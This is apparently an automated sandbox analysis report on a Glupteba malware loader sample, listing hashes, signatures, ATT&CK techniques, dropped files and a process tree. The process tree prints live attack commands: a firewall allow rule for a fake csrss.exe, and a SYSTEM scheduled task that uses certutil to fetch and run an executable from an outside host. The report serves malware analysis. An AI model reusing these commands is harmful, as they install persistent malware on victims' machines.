glupteba | 3b296bfeaef04d689cf5c357742add51fbaaf7784c836bc8efca5e98fabbc34e

General

Target

3b296bfeaef04d689cf5c357742add51fbaaf7784c836bc8efca5e98fabbc34e.exe
Size

3.8MB
MD5

f02dac5efe134817c1288500149c880a
SHA1

6842ad9cda7a7568df44a9cab65879f1fad02df7
SHA256

3b296bfeaef04d689cf5c357742add51fbaaf7784c836bc8efca5e98fabbc34e
SHA512

d8cdb257ce4dfaa98096b2ad0ebfceba736cea6c2316fada5744874b82e03f9444d2b906f7bab878976c819f369a79e353e574214f275f3ef6dd986539cae700

Score

10^/10

glupteba dropper evasion loader

Malware Config

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 2 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1988-56-0x00000000053D0000-0x0000000005AC6000-memory.dmp	family_glupteba
behavioral1/memory/1988-57-0x0000000000400000-0x00000000036BD000-memory.dmp	family_glupteba

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Modifies boot configuration data using bcdedit 1 IoCs

Processes:

bcdedit.exe

pid process

556 bcdedit.exe
Drops file in Windows directory 1 IoCs

Processes:

makecab.exe

description ioc process

File created C:\Windows\Logs\CBS\CbsPersist_20220524234855.cab makecab.exe
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

1056 schtasks.exe
1340 schtasks.exe

pid	process
556	bcdedit.exe

description	ioc	process
File created	C:\Windows\Logs\CBS\CbsPersist_20220524234855.cab	makecab.exe

pid	process
1056	schtasks.exe
1340	schtasks.exe

Modifies data under HKEY_USERS 1 IoCs

Processes:

netsh.exe

description	ioc	process
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

3b296bfeaef04d689cf5c357742add51fbaaf7784c836bc8efca5e98fabbc34e.exe

pid process

1988
580 3b296bfeaef04d689cf5c357742add51fbaaf7784c836bc8efca5e98fabbc34e.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

description pid process

Token: SeDebugPrivilege 1988
Token: SeImpersonatePrivilege 1988

pid	process
1988
580	3b296bfeaef04d689cf5c357742add51fbaaf7784c836bc8efca5e98fabbc34e.exe

description	pid	process
Token: SeDebugPrivilege	1988
Token: SeImpersonatePrivilege	1988

Suspicious use of WriteProcessMemory 7 IoCs

Processes:

3b296bfeaef04d689cf5c357742add51fbaaf7784c836bc8efca5e98fabbc34e.execmd.exe

description	pid	process	target process
PID 580 wrote to memory of 1632	580	3b296bfeaef04d689cf5c357742add51fbaaf7784c836bc8efca5e98fabbc34e.exe	cmd.exe
PID 580 wrote to memory of 1632	580	3b296bfeaef04d689cf5c357742add51fbaaf7784c836bc8efca5e98fabbc34e.exe	cmd.exe
PID 580 wrote to memory of 1632	580	3b296bfeaef04d689cf5c357742add51fbaaf7784c836bc8efca5e98fabbc34e.exe	cmd.exe
PID 580 wrote to memory of 1632	580	3b296bfeaef04d689cf5c357742add51fbaaf7784c836bc8efca5e98fabbc34e.exe	cmd.exe
PID 1632 wrote to memory of 300	1632	cmd.exe	netsh.exe
PID 1632 wrote to memory of 300	1632	cmd.exe	netsh.exe
PID 1632 wrote to memory of 300	1632	cmd.exe	netsh.exe

C:\Users\Admin\AppData\Local\Temp\3b296bfeaef04d689cf5c357742add51fbaaf7784c836bc8efca5e98fabbc34e.exe
"C:\Users\Admin\AppData\Local\Temp\3b296bfeaef04d689cf5c357742add51fbaaf7784c836bc8efca5e98fabbc34e.exe"
1⤵
PID:1988

C:\Users\Admin\AppData\Local\Temp\3b296bfeaef04d689cf5c357742add51fbaaf7784c836bc8efca5e98fabbc34e.exe
"C:\Users\Admin\AppData\Local\Temp\3b296bfeaef04d689cf5c357742add51fbaaf7784c836bc8efca5e98fabbc34e.exe"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:580

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
3⤵
- Suspicious use of WriteProcessMemory
PID:1632

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
4⤵
- Modifies data under HKEY_USERS
PID:300

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe ""
3⤵
PID:288

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://gfixprice.space/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
4⤵
- Creates scheduled task(s)
PID:1056

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
4⤵
- Creates scheduled task(s)
PID:1340

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
4⤵
PID:1804

C:\Windows\system32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
4⤵
- Modifies boot configuration data using bcdedit
PID:556

C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20220524234855.log C:\Windows\Logs\CBS\CbsPersist_20220524234855.cab
1⤵
- Drops file in Windows directory
PID:824

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Modify Existing Service

1

T1031

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
Filesize
893KB

MD5
2ea664b097e2a84aee2c7a2085577458

SHA1
324a99822d99233b466fe6776b78b0780679fde2

SHA256
911cb7aff552994955504386d37a09008326c1b6ddd6322c671ddbf8f13142fc

SHA512
8d0a1f94724fd56db9a4b045534145b2bb1b621808d5a7dedbb0bf4a4a6ca83d521a63b8cfbb622223884ee0cbfd92dc823aa4f40515c8c83880b28eaf10356a

Download Submit
C:\Windows\rss\csrss.exe
Filesize
1.4MB

MD5
74414c3661acd161d3d7ff29c81edfe1

SHA1
c4d9b9b30935faf469bf8cd827b1742ada3b0e52

SHA256
8ffb856a6956e18d1fbdd41647ea30a18c297d4d5fe1c120add2612a24abfddf

SHA512
571186187ce3ca761df4c46b38c6f9ea744b4c5f66053900c6449d9c2e0da7722d1ee40273041a59b57125bd4527a1174b667ee192bda27596f351d35b8cd8e1

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\patch.exe
Filesize
215KB

MD5
08b702915b1f3b5c9500c6d29f8c92e0

SHA1
ede533fddb3913c86be300eaad2f047fab34f3db

SHA256
94e99294885ba174a71da91fbdaaebbde37096af8dd087d158e0124db196e34f

SHA512
4a7e51f3183aa04e001183edb4d7e513069392412d252be93222ee78310e4418821a3a0711df87f930c3ba1f8bdd0194c53c797dfeeebb86eb33e290dbe9d7c7

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\patch.exe

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\patch.exe

Download Submit
\Users\Admin\AppData\Local\Temp\dbghelp.dll
Filesize
151KB

MD5
f2a71d3d33e06ddb057bb4f37dd5dae0

SHA1
f0be45b13e800a44d1bd09ac18a61dcda0f88cdd

SHA256
9af3da34463be0c98cf5cb62d9149718f5f066caa222c6a220f17f5f7035b722

SHA512
9e53dbfbde15ce244d2e0ec590e795490fb389fc85b9597f7f9cfdee41f8acead8e917116ee1a1e7cd1705a2ad7d99a4b950ca28b3cc99e3392bc333cc385f47

Download Submit
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

Download Submit
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

Download Submit
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

Download Submit
\Users\Admin\AppData\Local\Temp\osloader.exe

Download Submit
\Users\Admin\AppData\Local\Temp\osloader.exe

Download Submit
\Users\Admin\AppData\Local\Temp\osloader.exe

Download Submit
\Users\Admin\AppData\Local\Temp\symsrv.dll
Filesize
163KB

MD5
5c399d34d8dc01741269ff1f1aca7554

SHA1
e0ceed500d3cef5558f3f55d33ba9c3a709e8f55

SHA256
e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f

SHA512
8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d

Download Submit
\Windows\rss\csrss.exe
Filesize
1.4MB

MD5
536fa44cce5b72c3657af62a8505f425

SHA1
e9ee11cbc880057397a88fa8c01bab0dc7f44b1a

SHA256
94818659dc24cc429079efb89d2934551712c8ca1ed241326b0b62bf1eac97fa

SHA512
159b4cd04f9b8220e8dcbb1b1fc84568c1fa964aa0fedba2f615125357b00869a36971a2a5c09a895a456e7e575eb5d50f771510e88c0405e1a75c9b6033ca4e

Download Submit
\Windows\rss\csrss.exe
Filesize
1.9MB

MD5
efc8de890f0e17ee1cedef6fecb0ad43

SHA1
2a09c31bdf61949b322eeb078df66babb9d01b9c

SHA256
893d7b6e0ae935f19fe330c2ce350378ddb7831f005256cdae358629645c7fc0

SHA512
6d7636b88f35fd9996d59de662559d243849d96ee7f8f9b25d10cf974e7fe2c8efac5b9b098fa8c9e9b01f0be2c1056989f14b9740ca74f80a1d9ff60d5bedd6

Download Submit
memory/288-68-0x00000000050A0000-0x0000000005447000-memory.dmp

Filesize
3.7MB

Download
memory/288-77-0x0000000000400000-0x00000000036BD000-memory.dmp

Filesize
50.7MB

Download
memory/288-71-0x00000000050A0000-0x0000000005447000-memory.dmp

Filesize
3.7MB

Download
memory/288-66-0x0000000000000000-mapping.dmp

Download
memory/300-63-0x000007FEFC4B1000-0x000007FEFC4B3000-memory.dmp

Filesize
8KB

Download
memory/300-62-0x0000000000000000-mapping.dmp

Download
memory/556-84-0x0000000000000000-mapping.dmp

Download
memory/580-60-0x0000000000400000-0x00000000036BD000-memory.dmp

Filesize
50.7MB

Download
memory/580-59-0x0000000005020000-0x00000000053C7000-memory.dmp

Filesize
3.7MB

Download
memory/580-58-0x0000000005020000-0x00000000053C7000-memory.dmp

Filesize
3.7MB

Download
memory/1632-61-0x0000000000000000-mapping.dmp

Download
memory/1988-54-0x0000000005020000-0x00000000053C7000-memory.dmp

Filesize
3.7MB

Download
memory/1988-57-0x0000000000400000-0x00000000036BD000-memory.dmp

Filesize
50.7MB

Download
memory/1988-56-0x00000000053D0000-0x0000000005AC6000-memory.dmp

Filesize
7.0MB

Download
memory/1988-55-0x0000000005020000-0x00000000053C7000-memory.dmp

Filesize
3.7MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads